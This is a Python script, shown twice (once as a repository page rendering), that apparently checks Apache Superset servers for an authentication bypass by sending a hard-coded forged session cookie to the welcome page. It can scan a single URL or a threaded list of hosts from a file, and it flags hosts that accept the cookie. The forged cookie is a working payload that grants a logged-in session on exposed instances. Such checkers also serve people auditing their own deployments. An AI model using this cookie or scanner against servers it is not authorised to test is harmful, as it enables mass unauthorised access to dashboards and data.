Superset_auth_bypass_check/superset_auth_bypass_check.py

# -*- coding: utf-8 -*-
from urllib.parse import urlsplit
import argparse
import requests
import sys
import re
import threading
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning

# 自定义请求头字段
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
    "Cookie": "session=eyJ1c2VyX2lkIjoxfQ.ZEnvAw.psuAEJtVOeGlEgnJGqKLKSLE5WE"
}

vulurl=[]

#url合规检测执行
def urltest(url):
    parsed_url = urlsplit(url)
    if parsed_url.port == "443" and parsed_url.netloc:
        url="https://"+parsed_url.netloc+"/superset/welcome/"
        vultest(url) 
    if parsed_url.netloc and parsed_url.path:
        url=parsed_url.scheme+"://"+parsed_url.netloc+"/superset/welcome/"
        vultest(url)
    elif parsed_url.netloc:
        url=url+"/superset/welcome/"
        vultest(url)
    elif (not parsed_url.scheme) and parsed_url.path:
        url_1="http://"+url+"/superset/welcome/"
        vultest(url_1)
        url_2="https://"+url+"/superset/welcome/"
        vultest(url_2)
    else:
        modified_string = re.sub(r"[/\\].*", "/superset/welcome/", url)
        url_1="http://"+modified_string
        vultest(url_1)
        url_2="https://"+modified_string
        vultest(url_2)

#漏洞检测
def vultest(url):
    try:
        response = requests.get(url, headers=headers, verify=False , timeout=3)
        parsed_url = urlsplit(url)
        url=parsed_url.scheme+"://"+parsed_url.netloc
        # 检查响应头的状态码是否为200
        if response.status_code == 200 and ("Superset" in response.text):
            vulurl.append(url)
            print(url+"  [+]漏洞存在！！！")
            
        else:
            print(url+"  [-]漏洞不存在。")
    except RequestException:
        parsed_url = urlsplit(url)
        url=parsed_url.scheme+"://"+parsed_url.netloc
        print(url+"  [-]请求失败。")


#读取url或file
def main():
    # 禁用警告
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
    parser = argparse.ArgumentParser(description="读取命令行参数")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', '--url', help='URL 参数')
    group.add_argument('-f', '--file', help='file 参数')
    args = parser.parse_args()
    if args.url:
        urltest(args.url)
    elif args.file:
        threads_queue=[]
        with open(args.file, 'r') as file:
            for line in file:
                line=line.strip()
                read_thread = threading.Thread(target=urltest, args=(line,))
                threads_queue.append(read_thread)
                read_thread.start()
            for thread in threads_queue:
                thread.join()

    print("\n存在漏洞列表：")
    for url in vulurl:
        print(url+"  [+]漏洞存在！！！")

if __name__ == "__main__":
    main()
Add files via upload 2023-04-27 14:33:57 +08:00			`# -- coding: utf-8 --`
			`from urllib.parse import urlsplit`
			`import argparse`
			`import requests`
			`import sys`
			`import re`
			`import threading`
			`from requests.exceptions import RequestException`
			`from urllib3.exceptions import InsecureRequestWarning`

			`# 自定义请求头字段`
			`headers = {`
			`"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",`
			`"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8",`
			`"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",`
			`"Cookie": "session=eyJ1c2VyX2lkIjoxfQ.ZEnvAw.psuAEJtVOeGlEgnJGqKLKSLE5WE"`
			`}`

			`vulurl=[]`

			`#url合规检测执行`
			`def urltest(url):`
			`parsed_url = urlsplit(url)`
			`if parsed_url.port == "443" and parsed_url.netloc:`
			`url="https://"+parsed_url.netloc+"/superset/welcome/"`
			`vultest(url)`
			`if parsed_url.netloc and parsed_url.path:`
			`url=parsed_url.scheme+"://"+parsed_url.netloc+"/superset/welcome/"`
			`vultest(url)`
			`elif parsed_url.netloc:`
			`url=url+"/superset/welcome/"`
			`vultest(url)`
			`elif (not parsed_url.scheme) and parsed_url.path:`
			`url_1="http://"+url+"/superset/welcome/"`
			`vultest(url_1)`
			`url_2="https://"+url+"/superset/welcome/"`
			`vultest(url_2)`
			`else:`
			`modified_string = re.sub(r"[/\\].*", "/superset/welcome/", url)`
			`url_1="http://"+modified_string`
			`vultest(url_1)`
			`url_2="https://"+modified_string`
			`vultest(url_2)`

			`#漏洞检测`
			`def vultest(url):`
			`try:`
			`response = requests.get(url, headers=headers, verify=False , timeout=3)`
			`parsed_url = urlsplit(url)`
			`url=parsed_url.scheme+"://"+parsed_url.netloc`
			`# 检查响应头的状态码是否为200`
			`if response.status_code == 200 and ("Superset" in response.text):`
			`vulurl.append(url)`
			`print(url+" [+]漏洞存在！！！")`

			`else:`
			`print(url+" [-]漏洞不存在。")`
			`except RequestException:`
			`parsed_url = urlsplit(url)`
			`url=parsed_url.scheme+"://"+parsed_url.netloc`
			`print(url+" [-]请求失败。")`


			`#读取url或file`
			`def main():`
			`# 禁用警告`
			`requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)`
			`parser = argparse.ArgumentParser(description="读取命令行参数")`
			`group = parser.add_mutually_exclusive_group(required=True)`
			`group.add_argument('-u', '--url', help='URL 参数')`
			`group.add_argument('-f', '--file', help='file 参数')`
			`args = parser.parse_args()`
			`if args.url:`
			`urltest(args.url)`
			`elif args.file:`
			`threads_queue=[]`
			`with open(args.file, 'r') as file:`
			`for line in file:`
			`line=line.strip()`
			`read_thread = threading.Thread(target=urltest, args=(line,))`
			`threads_queue.append(read_thread)`
			`read_thread.start()`
			`for thread in threads_queue:`
			`thread.join()`

			`print("\n存在漏洞列表：")`
			`for url in vulurl:`
			`print(url+" [+]漏洞存在！！！")`

			`if __name__ == "__main__":`
			`main()`